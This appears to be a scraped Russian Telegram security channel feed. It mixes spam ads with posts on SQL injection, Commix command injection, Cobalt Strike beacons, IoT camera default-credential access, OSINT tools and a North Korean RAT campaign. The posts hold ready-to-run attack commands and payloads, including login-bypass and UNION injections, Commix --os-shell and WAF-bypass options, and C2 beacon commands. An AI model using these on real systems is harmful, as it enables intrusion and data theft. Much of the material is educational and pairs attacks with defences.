CodeGuard: CyberSec Edition

🤬Chat GPT отключат в РФ Офицальная причина была озвучена такая "Они нагружают систему, но купить платную версию не могут из-за своего местоположения". Другие крупные ИИ-сервисы начинают подхватывать эту политику. Чтоб не стать жертвой изоляции рунета, просто сохрани канал Доктор GPT - мы уже готовим обходку к новой системе безопасности. Не жди бана, подпишись: @gpt

Цифровой иммунитет: защита от киберугроз. Практическое руководство по кибергигиене и устойчивости систем для специалистов по ИБ 🖥 Интернет стал неотъемлемой частью повседневной жизни, и теперь вопрос защиты личных данных приобретает особую актуальность. Книга написана экспертом в информационной безопасности с 20-летним опытом, который создавал защитные системы для банков, операторов связи и государственных проектов. Антон Шустиков верит, что кибербезопасность может и должна быть простой, доступной для всех, и готов поделиться личным багажом знаний и практическими решениями. Одна из особенностей его книги в том, что в ней он знакомит читателя с основными понятиями в области цифровой безопасности в рамках современной информационной среды.

Автор приводит читателей к пониманию того, как именно работают угрозы в сети и предлагает комплексный подход к защите личной и корпоративной информации.

👩‍💻 Кликай и качай 😈 CyberSec Edition | Чат

ᅠᅠᅠᅠ🔤🅰️🔤🅰️ 🔤🔤🔤🔤🔤 ᅠᅠᅠ🔤🔤🔤🔤 🔤🔤🔤 🔤🔤🔤🔤 Хочешь получить базовые навыки Osint но не знаешь с чего начать? У меня есть для тебя предложение: 2 месяца интенсива — и ты готов к реальной работе в OSINT ᅠᅠᅠ🔤🔤🔤🔤🔤🔤 🔤🔤 🔐 Даём свой 🔤🇳🇱🔤 бесплатно на время курса 🎬 Видео остаются навсегда — пересматривай когда нужно 💼 Программа заточена под быстрый вход в работу 👨‍🏫 Живые семинары + личная проверка заданий ᅠᅠᅠ🔤🔤🔤🔤🔤🔤🔤🔤🔤 ⚖️ Правовая база OSINT 🔎 Браузерные операторы и инструменты 📱 Разведка в соцсетях 🌍 GEOINT и геолокация 🖼 Работа с изображениями и метаданными 🌐 Сетевой OSINT и Shodan *подробнее по ссылке ᅠᅠᅠ🔤🔤🔤🔤🔤🔤🔤🔤🔤 Привёл 1 друга → скидка 25% обоим Привёл 2 друзей → скидка 25% тебе и друзьям + V🇳🇱N 1 мес тебе Привёл 3 друзей → курс бесплатно тебе + V🇳🇱N 3 мес тебе + друзьям V🇳🇱N 1 мес + скидка 35% друзьям Писать -> @NullSpectreSec

SQL-инъекции: как не стать жертвой атаки на базу данных 💉 SQL-инъекции остаются одним из самых опасных векторов атаки на веб-приложения. Они позволяют злоумышленнику выполнять произвольные SQL-запросы к вашей базе данных, что может привести к краже, изменению или удалению данных. Понимание и предотвращение этих атак - базовый навык для любого разработчика. Основные типы SQL-инъекций. Вот на что обращать внимание:

🔵Классическая (UNION-based): Использует оператор UNION для объединения результатов легитимного запроса с данными из других таблиц. Цель - извлечение информации. 🔵Слепая (Blind): Приложение не возвращает данные запроса напрямую, но атакующий может делать выводы по поведению приложения (времени ответа или разным сообщениям об ошибке). 🔵Ошибко-ориентированная (Error-based): Злоумышленник намеренно вызывает ошибки SQL, чтобы приложение вернуло в ответе полезную для атаки отладочную информацию. 🔵Внеполосная (Out-of-band): Данные извлекаются не через HTTP-ответ, а через другие каналы (DNS-запросы, HTTP-запросы на сервер атакующего).

Базовый сценарий: Уязвимое приложение на Python Представьте, что у вас есть простой скрипт для аутентификации пользователя, который формирует SQL-запрос напрямую из пользовательского ввода. 1️⃣Уязвимый код Это классический пример, который открывает дверь для инъекции.

import sqlite3

username = input("Введите логин: ")
password = input("Введите пароль: ")

# ⚠️ КРИТИЧЕСКАЯ УЯЗВИМОСТЬ: данные подставляются напрямую в строку запроса!
query = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"

conn = sqlite3.connect('app.db')
cursor = conn.cursor()
cursor.execute(query) # Здесь произойдет инъекция
result = cursor.fetchone()

2️⃣ Пример атаки Вместо логина злоумышленник может ввести специально сформированную строку, которая изменит логику запроса.

Логин: admin'--
Пароль: (любой или пусто)

Это превратит исходный запрос в:

SELECT * FROM users WHERE username = 'admin'--' AND password = ''

Символы -- в SQL означают комментарий, поэтому условие проверки пароля игнорируется. Атакующий входит как admin без знания пароля. 3️⃣ Более опасная атака Можно пойти дальше и использовать оператор UNION для кражи данных из других таблиц.

Логин: ' UNION SELECT username, password FROM admins--
Пароль: x

Вывод: Прямая конкатенация пользовательского ввода в SQL-запрос - это гарантированная уязвимость, которая ставит под угрозу всю базу данных. Как работают основные методы защиты:

🔵Использование параметризованных запросов (Prepared Statements): Самый надежный метод. Данные пользователя передаются отдельно от команды SQL и никогда не интерпретируются как ее часть. 🔵Экранирование (Escaping): Специальные символы в пользовательском вводе преобразуются в безопасные последовательности. Менее надежно, чем параметризованные запросы. 🔵Валидация и санитизация ввода: Проверка данных на соответствие ожидаемому формату (например, только цифры для ID). Дополнительный, но не основной слой защиты. 🔵ORM (Object-Relational Mapping): Библиотеки вроде SQLAlchemy или Django ORM по умолчанию используют параметризованные запросы, что сводит риск к минимуму.

Защита: Как исправить уязвимый код?

🔴Всегда используйте параметризованные запросы. Это правило №1. 🔴Никогда не доверяйте пользовательскому вводу. Считайте весь ввод потенциально враждебным. 🔴Применяйте принцип минимальных привилегий. У учетной записи приложения в БД не должно быть прав на DROP или произвольное изменение схемы. 🔴Используйте готовые фреймворки и ORM, которые реализуют безопасные практики по умолчанию. 🔴Регулярно проводите аудит безопасности кода и используйте сканеры уязвимостей (например, SQLMap для тестирования).

😈 CyberSec Edition | Чат

Изоляция рунета ближе, чем ты думаешь

Loading … ██████████████] 99%

Роскомнадзору дали карт-бланш на блокировки, а «белые списки» сайтов тестируют уже в десятках регионов. И гайки будут закручиваться только сильнее. Чтобы в одночасье не лишиться доступа к свободному Интернету, просто сохрани Only Hack. Тут профессиональный хакер делится фишками, с которыми доступ к глобальной сети у тебя будет даже в случае ядерного апокалипсиса. Не жди момента «Х». Перестрахуйся подпиской.

Анализ безопасности веб-проектов 📊 Крэш-курс по техникам аудита безопасности веб-проектов. После прохождения курса вы освоите: общие знания относительно рисков, сопровождающих современные интернет-приложения; методики анализа безопасности клиент-серверных приложений; методики анализа кода; архитектурный анализ; практики разработки защищенных приложений. Начальные требования:

Для успешного прохождения курса требуются общие знания в области веб-технологий: что из себя представляет язык гипертекстовой разметки, как реализуется клиент-серверное взаимодействие, что такое tcp/ip.

👩‍💻 Проходим курс здесь 😈 CyberSec Edition | Чат

Хочешь зарабатывать с ИИ? Сейчас очень взрывают видео с ИИ моделями-красотками, видео залетают на миллионы. Ты можешь понять структуру создания этих моделей, зайдя в этот канал. В нем уже рассказали, как заработать с этих красоток! Не упускай возможности заскочить в последний вагон трендов, заходи и зарабатывай!

OS Command Injection через Commix: от параметра до RCE 💀 Веб-приложение пингует сервер? Принимает ip=127.0.0.1? А если вместо этого ip=127.0.0.1; id — получишь выполнение команд? Commix автоматизирует поиск и эксплуатацию OS Command Injection до полного RCE. 1️⃣ В чём суть Commix ищет и эксплуатирует OS Command Injection (classic, blind, time-based) и позволяет выполнять системные команды, получать shell и закрепляться на сервере. 2️⃣ Полная практика

# 1. Базовый скан GET-параметра
commix -u "http://target.com/ping.php?ip=127.0.0.1" --batch

# 2. Проверка POST-запроса
commix -u "http://target.com/ping.php" --data="ip=127.0.0.1" --batch

# 3. Указываем конкретный параметр
commix -u "http://target.com/ping.php?ip=127.0.0.1" -p ip

# 4. Выполнение команды
commix -u "http://target.com/ping.php?ip=127.0.0.1" --os-cmd="whoami"

# 5. Получаем pseudo-shell
commix -u "http://target.com/ping.php?ip=127.0.0.1" --os-shell

3️⃣ Выводы Commix в реале

[INFO] OS Command Injection vulnerability detected
[INFO] Payload: ;id;
[INFO] Current user: www-data
[INFO] Operating system: Linux

4️⃣ Продвинутые фишки

# Blind / Time-based injection
commix -u URL --technique=t --time-sec=5

# Обход WAF
commix -u URL --tamper=space2ifs,backticks

# User-Agent spoofing
commix -u URL --random-agent

# Прокси / TOR
commix -u URL --proxy=socks5://127.0.0.1:9050

🧠 Где тренироваться: DVWA, bWAPP, Metasploitable2, Hack The Box (old-school boxes) Полезно? ❤️ — Да 👍 — Нет 😈 CyberSec Edition | Чат

🤡 Сколько раз «взламывали Пентагон» на самом деле? Короткий ответ: точного числа никто не назовёт — часть инцидентов засекречена, часть считается «обычными» атаками, а десятки тысяч «взломов» идут в рамках легальных баг-баунти и тестов. Но есть несколько показательных историй и официальных цифр, которые ломают миф про «неприступную крепость». Реальные громкие взломы (которые признали) 1999 — Джонатан Джеймс (C0mrade), 15 лет.

Получил доступ к системам Пентагона и другим сетям Минобороны США, перехватывал трафик и данные, кейс считается первым публично признанным взломом Пентагона.

2001–2002 — «безработный из Лондона» (дело Гари Маккиннона).

Несколько раз проникал в сети армии, флота, NASA и Минобороны, получал права администратора, удалял файлы и ставил удалённый доступ RemotelyAnywhere; пострадало около сотни военных и космических машин.

2008 — заражённая флешка на базе США.

В ноутбук армии США на Ближнем Востоке вставили флешку с вредоносом, тот распространился по обычным и секретным сетям Пентагона — это назвали «крупнейшим взломом сети Пентагона» на тот момент и пересмотрели стратегию киберзащиты.

2015 — компрометация почтовой системы военного командования.

Экс‑глава объединённого комитета начальников штабов США заявлял, что «российские хакеры» взломали электронную почту структур Пентагона в августе 2015 года.​

Параллельно — многолетние утечки и атаки на смежные системы.

Похищение данных о F‑35, кража 24 тыс. секретных файлов в 2011 году, взломы NASA, армейских и ведомственных сетей — всё это не всегда формально именуют «взломом Пентагона», но по факту бьют по инфраструктуре Минобороны США.

«12 000+ взломов» — о чём на самом деле цифры К концу 2020 года Минобороны США зафиксировало более 12 тысяч найденных уязвимостей через платформы вроде HackerOne — это запуски контролируемых тестов и баг‑баунти, а не «успешные атаки врага». Участники находили баги во внешних системах, веб‑сервисах и инфраструктуре Пентагона, получая от 100 до 15 000 долларов за каждую критичную уязвимость, в отдельных конкурсах за считанные минуты успев обнаружить сотни проблем. То есть формально «взломы» там происходят десятки тысяч раз, но большая часть — легальные, согласованные проникновения ради укрепления защиты, а не шпионские операции. 😈 CodeGuard | Chat

Кибербезопасность теперь в Telegram! Тот самый канал, которого будет достаточно для того, чтобы стать настоящим безопасником абсолютно бесплатно! 🧠 Пакет Знаний – @study_security 📌 Инструменты, гайды, шпаргалки, книги и тренажеры для белых хакеров.

Как ломают камеры через интернет Эту фигню называют IoT-апокалипсисом: миллионы камер, роутеров и 'умных' устройств висят в сети с паролями admin/admin. Их взламывают не через навороченные эксплойты, а через простейшие методы. 🛠 Типичные векторы атаки:

▶️ Brute-force - перебор стандартных паролей (admin, 12345, пустой). ▶️ Поиск уязвимостей в веб-интерфейсе - старые версии ПО, injection-дыры. ▶️ Шпионские облачные сервисы - доступ к данным через 'левые' китайские платформы. ▶️ Ботнеты (вроде Mirai) - заражают устройства для DDoS-атак.

Демонстрация (для исследования!):

# Пример запроса к уязвимой камере (изменённый)
curl -X POST "http://192.168.1.1/login.cgi" \
  -d "username=admin&password=admin"
# Ответ: 'OK' и сессионная кука.
# Далее доступ к live-стриму: rtsp://admin:@192.168.1.1:554/stream1

Кто виноват?

- Производители, которые пашут на удешевление. - Пользователи, которые не меняют пароли. - Исходники прошивок, полные говна.

Что делать?

▶️ Менять пароль по умолчанию. ▶️ Отключать UPnP и WPS. ▶️ Выпиливать камеру из публичного интернета (без проброса портов). ▶️ Ставить обновления, если они вообще есть.

Shodan - поисковик дыр 😈 CodeGuard | Chat

👩‍💻 Хватит учить только синтаксис, начинай делать реальные проекты! Python Ready — авторский канал, где Python перестаёт быть только теорией и становится рабочим инструментом. Мини-проекты, боты, советы, разборы задач, гайды и шпаргалки для каждого программиста. 🔥 Советую подписаться: @python_ready

Cobalt Strike: инструмент для эксплуатации и управления доступом ⚔️ При успешном проникновении в сеть нужен инструмент для контроля и дальнейшей эксплуатации. Cobalt Strike - это платформа для моделирования угроз и управления доступом (command & control), которая позволяет злоумышленнику закрепиться в системе и передвигаться по сети. Используется в легальном тестировании на проникновение для моделирования действий продвинутых угроз (APT). Cobalt Strike работает с различными "маяками". Вот основные типы:

🔵HTTP/HTTPS Beacon: Наиболее распространён. Имитирует легитимный веб-трафик, общается с сервером команды и управления (C2) через HTTP-запросы. 🔵DNS Beacon: Использует DNS-запросы для скрытого канала связи, часто обходит простые веб-фильтры. 🔵SMB Beacon: Коммуницирует через именованные каналы (named pipes), что полезно для внутреннего перемещения в доменной среде. Payload-ы: Эксплойты для доставки Beacon, такие как исполняемые файлы (exe), документы Office с макросами или скрипты PowerShell.

Базовый сценарий: Развёртывание HTTPS Beacon Представьте, что вы специалист по безопасности (пентестер) и после фишинга получили доступ к рабочей станции в целевой сети. Теперь нужно установить стабильный канал управления. 1️⃣ Настройка Team Server (C2) Cobalt Strike разворачивается на сервере атакующего (Team Server), который принимает подключения от Beacon.

# Запуск Team Server (на сервере атакующего)
./teamserver [VPS_IP] [Shared_Password] [Profile_File]

2️⃣ Создание Payload и запуск Beacon В клиенте Cobalt Strike создаётся вредоносный пакет (payload) для целевой системы.

# Генерация исполняемого файла (exe) с HTTPS Beacon
Attacks → Packages → Windows Executable (S)
Выбор Listener: HTTPS, указание домена C2 и порта.

После доставки payload на цель (например, через фишинг) и его выполнения, на Team Server приходит "callback" от Beacon. 3️⃣ Взаимодействие и управление В клиенте появится новая сессия. Теперь можно выполнять команды, загружать модули, перемещаться по сети. Пример базовых команд в Beacon:

shell whoami          # Выполнить системную команду
upload /tmp/tool.exe # Загрузить файл на цель
download secret.txt  # Скачать файл с цели
portscan 10.10.0.0/24 445 # Просканировать сеть на порт 445

Результат (пример):

Beacon established to WORKSTATION-01\jdoe (High Integrity)

Вывод: Beacon успешно внедрён в целевую систему под учётной записью пользователя с высоким уровнем привилегий. Это точка опоры для дальнейшей атаки. Как это работает изнутри:

🔵Malleable C2 Profile: Конфигурационный файл, который маскирует трафик Beacon под легитимные сервисы (например, под запросы к Google или Microsoft). 🔵Стадия (Staging): Малый начальный payload (stager) загружает основной payload (Beacon) в память, часто минуя диск. 🔵Сон (Sleep) и Jitter: Beacon не активен постоянно. Он "спит" заданные интервалы и добавляет случайную задержку (jitter), чтобы усложнить обнаружение.

Защита: Как обнаружить и противостоять?

🔴Мониторинг сетевого трафика. Ищите аномальные DNS-запросы, регулярные HTTPS-соединения на нестандартные порты и несоответствие трафика заявленным User-Agent. 🔴Анализ процессов в памяти. Инструменты вроде EDR (Endpoint Detection and Response) могут обнаруживать инъекции кода и подозрительные действия PowerShell. 🔴Регулярное обучение пользователей для предотвращения успешных фишинговых атак - первоначального вектора доставки. 🔴Строгое сегментирование сети и применение принципа минимальных привилегий (Least Privilege) для ограничения перемещения атакующего.

😈 CodeGuard | Chat

Хочешь в хакинг? Тогда читай мой канал. В нём ты узнаешь с чего начать, увидишь интересные кейсы из социальной инженерии, прочувствуешь все прелести пентеста на себе прочитаешь про забавные случаи из мира ИБ и посмеёшься над тупыми инфоцыгами. 🐈‍⬛Дорожная карта со стажёра до мидла 🐈‍⬛ О важности методологии в ИБ 🐈‍⬛ Переиграли мошенника и угнали его акк Сфинкс. Подписаться.

Настройка локального кэша с ufw в Ubuntu: скорость без дыр Кэширование на локальной машине может серьезно разогнать работу приложений, но если сделать это по-дебильному - любой желающий сможет заглянуть в ваш кэш через сеть. Связка Memcached (или Redis) и ufw решает это, давая скорость и базовую безопасность. Memcached - простая, но мощная система кэширования данных в оперативной памяти. По умолчанию она слушает на всех интерфейсах, что - полная хрень для локальной машины. 🛡Зачем связывать с ufw?

➡️ Блокировка внешнего доступа к порту кэша (11211) ➡️ Разрешение доступа только с localhost или определенных внутренних IP ➡️ Защита от случайного "открытия" сервиса в сеть ➡️ Простая и понятная конфигурация правил

⚡️ Быстрая настройка связки: 1️⃣ Установка Memcached и ufw:

sudo apt update
sudo apt install memcached ufw

2️⃣ Базовая конфигурация Memcached (ограничение на localhost):

sudo nano /etc/memcached.conf
# Найти строку с `-l 127.0.0.1` и убедиться, что она раскомментирована
sudo systemctl restart memcached

3️⃣ Настройка ufw для полной блокировки внешнего доступа:

sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow ssh
sudo ufw allow from 127.0.0.1 to any port 11211
sudo ufw enable
sudo ufw status verbose

💡 Для более сложных сценариев (например, доступ с другого сервиса в приватной подсети) можно настроить правило точнее, например:

sudo ufw allow from 192.168.1.0/24 to any port 11211

🚀 Официальный сайт Memcached 😈 CodeGuard | Chat

🤖 Инструменты для OSINT и разведки информации Если ты занимаешься анализом данных, киберразведкой или цифровой атрибуцией, вот набор актуальных инструментов для добычи и систематизации открытой информации:

1) Maltego — мощный инструмент для визуализации связей между людьми, доменами и организациями. 2) theHarvester — поиск e-mail, доменов и IP через публичные источники. 3) SpiderFoot — автоматический фреймворк OSINT для поиска по более чем 100 источникам. 4) Recon-ng — модульный инструмент для сбора информации через API-сервисы. 5) Shodan — "поисковик хакеров", индексирует IoT, камеры, серверы. 6) Censys — глобальный поиск по онлайн-устройствам и сертификатам SSL. 7) Amass — автоматический сбор поддоменов и сетевых связей. 8) FOCA — извлечение метаданных из документов и изображений. 9) ExifTool — анализ и извлечение метаданных из файлов и фото. 10) Creepy — геолокация пользователей по фото и соцсетям. 11) GHunt — исследование Google-аккаунтов по публичным данным. 12) Sherlock — поиск аккаунтов по имени пользователя на сотнях сайтов. 13) Holehe — проверка, на каких сервисах зареган email. 14) Social-Analyzer — анализ профилей человека по соцсетям и онлайн-сервисам. 15) Metagoofil — извлечение документов из домена и анализ их метаданных. 16) DNSDumpster — интерактивный поиск DNS-записей и поддоменов. 17) Wayback Machine — просмотр старых версий сайтов и утечек страниц. 18) WhoisXML API — WHOIS и IP-аналитика для доменов и инфраструктуры. 19) IntelX — поиск утечек, ключей API и паролей из открытых источников. 20) ReconDog — легкий и гибкий инструмент для первичного сбора данных.

Этот OSINT-набор помогает работать "в белую": исследовать следы, находить инсайты и выстраивать аналитическую картину события. Будь орлом, поставь 👍 😈 CodeGuard | Chat

Приглашаем специалистов по кибербезопасности в канал “MONT и партнеры”. Для вас мы сделали специальную рубрику #ИБ_разбор. В ней рассматриваем новые продукты и сервисы, помогаем разобраться: кому и зачем будет полезно каждое из решений. Читайте в канале: • Kaspersky Endpoint Security: какую версию выбрать для защиты от сложных угроз • Как построить отказоустойчивую сеть для распределенных филиалов с SD-WAN • NGFW в России — миграция продолжается: взгляд изнутри от «Лаборатории Касперского» • Почта и веб без вирусов и атак: как исключить риски бизнеса? • Почему даже корпорации теряют данные: эксперт MONT о причинах утечек и защите бизнеса. 👉 Подписывайтесь @komandamont

🧠 Zerolog: быстрая и структурированная логика логов Zerolog — это сверхэффективная open-source библиотека для структурированного логирования на Go. Она спроектирована для минимального потребления памяти и скорости, которая в разы выше классических логгеров вроде logrus или zap. Zerolog использует JSON в качестве формата по умолчанию, что позволяет легко интегрировать логи в системы вроде ELK, Loki, Datadog или OpenSearch. ⚙️ Ключевые особенности Zerolog:

▶️ Формат JSON без аллокаций и отражений (reflection-free). ▶️ Поддержка уровней логирования (debug, info, warn, error, fatal, panic). ▶️ Встроенные timestamp’ы, stack trace и caller info. ▶️ Простая интеграция с context.Context для tracing’а. ▶️ Поддержка chainable API — декларативный стиль. ▶️ Совместимость с OpenTelemetry и структурными парсерами.

⚡️ Быстрый старт с Zerolog: Установка:

go get github.com/rs/zerolog/log

Использование:

package main

import "github.com/rs/zerolog/log"

func main() {
    log.Info().Str("service", "auth").Msg("Server started")
}

🟢Подходит для микросервисов, CLI и облачных приложений. 🟢Совместим с Docker, Kubernetes и Serverless инфраструктурой. 🟢Простое масштабирование логов через JSON pipeline.

💻 Репозиторий GitHub 😈 CodeGuard: PySec Edition | Чат

Хочешь тестовое задание? Получи RAT!! Северокорейские хакеры снова в деле — на этот раз они притворяются рекрутерами, чтобы заманивать разработчиков в ловушку. Под видом тестовых заданий на позицию JS или Python‑программиста “работодатель” присылает проект, который нужно запустить и доработать. Но вместо безобидного кода внутри прячется загрузчик трояна удалённого доступа (RAT). Исследователи из ReversingLabs выяснили, что злоумышленники распространяют заражённые пакеты через npm и PyPI, а кампания идёт уже с прошлого года. Всего найдено 192 вредоносных пакета, объединённых под именем Gragphalgo. В одном из случаев пакет bigmathutils был безопасен до версии 1.1.0, а затем превратился в ловушку и вскоре был удалён, чтобы скрыть следы. Хакеры создают фейковые компании в крипто‑сфере, публикуют вакансии на платформах вроде LinkedIn, Reddit и Facebook, и используют GitHub‑организации, чтобы придать всему реалистичный вид. По данным экспертов, за этой схемой, скорее всего, стоит печально известная группировка Lazarus, ранее замеченная в атаках на криптовалютные проекты. Ссылка на новость ➝ [клац] 😈 CodeGuard | Chat

⚡️Слита База из 1000+ топовых курсов и материалов для айтишников Отсортировали их для вашего удобства и выложили в телеграм-каналы по категориям: 🖥 Python — 1558+ материалов 👩‍💻 Frontend — 1241+ материалов 👩‍💻 Backend — 1095+ материалов 🤖 Нейросети – 855+ материалов ⚙️ Программы — 978+ материалов 📚 Книги по IT — 779+ материалов Всё лучшее про IT бесплатно — уже на Базе 🚀